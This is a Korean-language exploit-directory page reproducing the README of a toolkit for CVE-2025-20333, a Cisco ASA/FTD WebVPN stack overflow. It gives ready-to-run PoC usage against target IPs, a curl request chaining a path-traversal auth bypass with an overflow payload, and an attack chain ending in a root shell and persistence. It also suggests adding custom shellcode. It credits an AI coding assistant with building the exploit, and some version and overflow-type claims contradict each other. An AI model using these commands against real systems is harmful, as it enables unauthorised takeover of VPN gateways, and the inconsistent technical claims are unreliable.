Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/cobbbex/cve-2025-20333
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed TeamingBinary Exploitation
GitHubcobbbex/cve-2025-20333

cve-2025-20333

CVE-2025-20333(Cisco ASA/FTD WebVPN의 치명적인 스택 버퍼 오버플로)을 위한 완전한 연구 및 익스플로잇 툴킷입니다. 상세한 바이너리 분석, Python 및 bash 기반 PoC 익스플로잇, 그리고 익스플로잇 가이드를 포함합니다.

저장소 보기
271개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-20333 - 종합 연구 및 익스플로잇 툴킷

개요

이 디렉토리에는 CVE-2025-20333에 대한 종합적인 연구, 분석 및 개념 증명 코드가 포함되어 있습니다. 이는 Cisco ASA/FTD WebVPN 서버의 치명적인 스택 버퍼 오버플로 취약점입니다.

상태: ⚠️ 실제 환경에서 적극적으로 악용됨 (ArcaneDoor 캠페인)
CVSS 점수: 9.8 치명적
인증: 불필요 (CVE-2025-20362를 통해 우회)
영향: 루트 권한으로 원격 코드 실행


목차

📚 문서

CVE-2025-20333-RESEARCH-NOTES.md (20 KB)

완전한 리버스 엔지니어링 연구

  • 취약점 컨텍스트 및 웹 인텔리전스
  • 바이너리 분석 (ASA 9.12.4.x lina 프로세스)
  • 요청 수집 계층 감사
  • Lua API 바인딩 분석
  • 🎯 오버플로 발견 (body_lexer.re2c, FUN_0302e690)
  • 공격 체인 분석
  • 코드 패턴을 통한 근본 원인 분석
  • 도구 및 주소 참조 테이블

핵심 발견:

body_lexer.re2c의 고정 16바이트 버퍼 (local_58[16])
URL 디코딩 루프에 경계 검사가 없음
iVar11 < 16을 확인하지 않고 local_58[iVar11]에 쓰기
8개의 16진수 쌍 이후: 오버플로 → 스택 손상 → RCE

EXPLOITATION-GUIDE.md (12 KB)

실전 익스플로잇 매뉴얼

  • 취약점 메커니즘 설명
  • 완전한 공격 체인 (CVE-2025-20362 우회 + 오버플로)
  • 단계별 익스플로잇 워크스루
  • 페이로드 제작 기법
  • 네트워크 기반 탐지 방법
  • 호스트 기반 탐지 및 로그 분석
  • 완화 전략
  • 패치 버전 및 업그레이드 경로
  • 법적 및 윤리적 고려사항

🔧 개념 증명 익스플로잇

cve-2025-20333-poc.py (15 KB)

모든 기능을 갖춘 Python 익스플로잇

기능:

  • 자동 페이로드 생성
  • CVE-2025-20362 경로 탐색 통합
  • ROP 가젯 체인 구성
  • SSL/TLS 지원
  • 구성 가능한 타임아웃
  • 상세 진행 보고

사용법:

# 취약점 세부 정보 표시
python3 cve-2025-20333-poc.py --details

# 대상 익스플로잇
python3 cve-2025-20333-poc.py 192.168.1.100 443

# 사용자 지정 설정
python3 cve-2025-20333-poc.py firewall.example.com 8443 -t 30

cve-2025-20333-poc.sh (8.5 KB)

경량 bash 익스플로잇

기능:

  • Python 의존성 없음
  • curl 또는 netcat 사용
  • 최소 리소스 사용
  • 교육용 주석
  • 명확한 상태 출력

사용법:

# 세부 정보 표시
./cve-2025-20333-poc.sh --details

# 익스플로잇
./cve-2025-20333-poc.sh 192.168.1.100 443 10

# curl로 수동 실행
curl -X POST https://target/+CSCOU+/../+CSCOE+/files/file_list.json \
  -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" --insecure

취약점 요약

빠른 사실

속성값
CVE IDCVE-2025-20333
유형스택 버퍼 오버플로 (CWE-120)
구성 요소body_lexer.re2c (FUN_0302e690)
영향받는 버전ASA 9.16–9.23, FTD 7.0–7.7
CVSS v3.19.8 (치명적)
인증불필요 (CVE-2025-20362 경유)
사용자 상호작용없음
영향루트 권한 RCE, 전체 시스템 손상
상태적극적으로 악용됨 (2025년 5월 이후)
책임 있는 공개Cisco 패치 완료, 권고 게시됨

근본 원인

// body_lexer.re2c - URL 디코딩 루프
byte local_58[16];  // ← 고정 16바이트 버퍼

while (parsing_request_body) {
    byte input = *data++;
    
    if (input == '%') {
        hex_decode_mode = true;
        hex_index = 0;
    }
    
    if (hex_decode_mode) {
        local_58[hex_index] = input;  // ← 경계 검사 없음!
        hex_index++;
        
        if (hex_index == 2) {
            byte decoded = hex_pair_to_byte(local_58[0], local_58[1]);
            hex_decode_mode = false;
        }
    }
}

오버플로 트리거: POST 본문의 9개 이상의 연속된 %XX 시퀀스

공격 체인

1. 공격자 (인증 불필요)
   ↓
2. /+CSCOU+/../+CSCOE+/files/file_list.json으로 HTTP POST
   ├─ CVE-2025-20362: 경로 탐색으로 인증 검사 우회
   └─ files_retr.lua 엔드포인트 도달 (auth_flag = 0)
   ↓
3. POST 본문: name=%2f%2f%2f%2f%2f%2f%2f%2f%2f
   (9개 이상의 URL 인코딩 쌍)
   ↓
4. body_lexer.re2c가 POST 본문 처리
   ├─ 16진수 쌍을 local_58[16]에 누적
   └─ 8개 쌍 이후: 오버플로!
   ↓
5. 스택 손상
   ├─ local_48, local_40 덮어쓰기
   ├─ 저장된 RBP 덮어쓰기
   └─ 저장된 RIP (반환 주소) 덮어쓰기
   ↓
6. 제어 흐름 탈취
   ├─ RIP가 ROP 가젯을 가리킴
   ├─ ROP 체인이 execve() 설정
   └─ execve("/bin/sh", NULL, NULL)
   ↓
7. 루트 권한 RCE (lina 프로세스는 루트로 실행)
   ├─ 전체 VPN 서버 손상
   ├─ 모든 VPN 트래픽 접근
   └─ NVRAM 수정을 통한 지속성 확보

연구 프로세스

1단계: 바이너리 분석 ✅

  • Ghidra에서 lina 바이너리 열기
  • WebVPN 요청 아키텍처 매핑 (HTTP 파서, URL 라우터, 13개 엔드포인트 훅)
  • 요청 수집 계층 감사 (모두 clString/정확한 크기 할당으로 안전)
  • Lua API 바인딩 검토 (모두 안전)

2단계: 웹 인텔리전스 ✅

  • CVE-2025-20333 기술 세부 정보 검색
  • Rapid7, Zscaler, Horizon3, Tenable 분석 확인
  • 공격 체인이 /+CSCOU+/../+CSCOE+/files/file_list.json 사용 확인
  • 근본 원인 식별: Lua 엔드포인트의 힙 기반 (웹 소스) / 스택 기반 (이 바이너리) 오버플로

3단계: 표적 리버싱 ✅

  • body_lexer.re2c 디컴파일 (FUN_0302e690)
  • 발견: 경계 검사가 없는 고정 16바이트 버퍼 local_58[16]
  • 오버플로 경로 확인: URL 디코딩 루프 → 무제한 쓰기
  • 도달 가능성 검증: files_retr.lua → body_lexer → 스택 오버플로

4단계: 익스플로잇 개발 ✅

  • ROP 체인 지원 Python PoC 생성
  • 최소 환경용 bash PoC 생성
  • 페이로드 구조 및 제작 기법 문서화
  • 탐지 및 완화 지침 포함

사용 지침

공인된 침투 테스트용

  1. 권한 확인

    • 테스트에 대한 서면 승인 획득
    • 대상 시스템 세부 정보 확인 (IP, 포트, 버전)
    • 범위 및 일정 문서화
  2. 익스플로잇 실행

    # 빠른 확인: 대상이 익스플로잇 시도에 응답하는가?
    python3 cve-2025-20333-poc.py <target_ip>
    
    # 또는 bash 버전:
    ./cve-2025-20333-poc.sh <target_ip>
    
  3. 익스플로잇 검증

    • 셸 접근 / 리버스 셸 연결 확인
    • 시스템 로그에서 충돌 또는 이상 징후 검사
    • 수정된 파일 검색 (NVRAM, 지속성 백도어)
  4. 결과 문서화

    • 대상 버전, 패치 수준 기록
    • 익스플로잇 성공/실패 문서화
    • 발견된 방어 조치 기록
    • 완화 권장사항과 함께 고객에게 보고

보안 연구용

  1. 연구 노트 읽기

    • CVE-2025-20333-RESEARCH-NOTES.md 학습
    • 바이너리 아키텍처 및 오버플로 메커니즘 이해
  2. PoC 연구

    • ROP 가젯 구성을 위한 Python PoC 검토
    • 최소 익스플로잇용 bash PoC 검토
    • 페이로드 인코딩 이해
  3. 적응 및 확장

    • 사용자 지정 셸코드 추가
    • 다양한 익스플로잇 기법 구현
    • 패치 버전 vs 취약 버전 테스트

중요 경고

⚠️ 법적 고지

이 툴킷은 공인된 보안 테스트 전용으로 제공됩니다.

  • 금지: 명시적 서면 승인 없이 시스템에 사용
  • 금지: 악의적인 목적 (데이터 도용, 서비스 중단, 랜섬웨어)으로 사용
  • 무단 접근은 미국 컴퓨터 사기 및 남용 법안 (CFAA) 및 전 세계 유사 법률을 위반합니다
  • 처벌에는 형사 기소, 벌금, 징역이 포함됩니다

✅ 공인된 사용:

  • 서면 승인을 받은 침투 테스트
  • 취약점 연구 중 개념 증명
  • 내부 보안 테스트
  • CTF 대회
  • 학술 연구

❌ 금지된 사용:

  • 허가 없이 시스템 공격
  • 랜섬웨어 배포
  • 데이터 도용 또는 협박
  • 서비스 중단
  • 손상된 네트워크에서의 측면 이동

파일 매니페스트

cve-2025-20333/
├── README.md                              (이 파일)
├── CVE-2025-20333-RESEARCH-NOTES.md      (20 KB, 종합 연구)
├── EXPLOITATION-GUIDE.md                 (12 KB, 실전 가이드)
├── cve-2025-20333-poc.py                 (15 KB, Python PoC)
└── cve-2025-20333-poc.sh                 (8.5 KB, bash PoC)

총 문서: ~65 KB
연구 깊이: 50개 이상의 Ghidra 함수 감사
검증된 발견: body_lexer.re2c의 버퍼 오버플로 확인


빠른 참조

취약점 빠른 테스트

# 대상이 익스플로잇에 취약한지 테스트
curl -X POST https://<target>/+CSCOU+/../+CSCOE+/files/file_list.json \
  -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" \
  --insecure \
  -i

# 대상이 응답하면 (200, 500, 충돌), 취약할 수 있음
# 대상이 차단/리다이렉트하면, 패치되었을 수 있음

버전 확인

# 취약한 버전:
# - Cisco ASA 9.16 ~ 9.23
# - Cisco FTD 7.0 ~ 7.7

# SSH/콘솔로 ASA 버전 확인:
show version

# 패치된 버전:
# - ASA 9.16.4.51, 9.18.4.31, 9.20.4.49, 9.22.4.9, 9.24.1+
# - FTD 7.0.x, 7.1.x, 7.2.x (패치됨)

완화 체크리스트

  • ASA/FTD 버전 확인
  • 사용 가능한 패치 확인
  • 취약한 경우 패치 버전으로 업그레이드
  • IP 주소로 WebVPN 접근 제한
  • 로깅 및 모니터링 활성화
  • CVE-2025-20362 경로 탐색 시도 모니터링
  • DoS 패턴 모니터링 (lina 충돌)
  • WebVPN 포트에 방화벽 보호 활성화

참고 자료

  • Cisco 보안 권고: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB
  • Rapid7 분석: https://www.rapid7.com/blog/post/etr-cve-2025-20333-cve-2025-20362-cve-2025-20363-multiple-critical-vulnerabilities-affecting-cisco-products/
  • Zscaler ThreatLabz: https://www.zscaler.com/blogs/security-research/cisco-firewall-and-vpn-zero-day-attacks-cve-2025-20333-and-cve-2025-20362
  • Tenable FAQ: https://www.tenable.com/blog/cve-2025-20333-cve-2025-20362-faq-cisco-asa-ftd-zero-days-uat4356

면책 조항

이 툴킷은 교육 및 공인된 테스트 목적으로만 AS-IS로 제공됩니다.

  • 사용에 따른 책임은 본인에게 있습니다
  • 오용에 대한 보증 또는 책임 없음
  • 무단 접근은 불법입니다
  • 발견 사항을 Cisco 및 영향받는 조직에 책임 있게 보고하세요
  • 해당 국가의 사이버 보안 법률을 준수하세요


기여자

이 프로젝트는 Anthropic의 AI 기반 코딩 어시스턴트인 Claude Code의 도움으로 개발되었습니다.


작성일: 2026-08-23
연구 기간: 2026-08-22 ~ 2026-08-23
상태: 완료 및 문서화
분류: 교육용 / 공인된 테스트 전용

도구 다운로드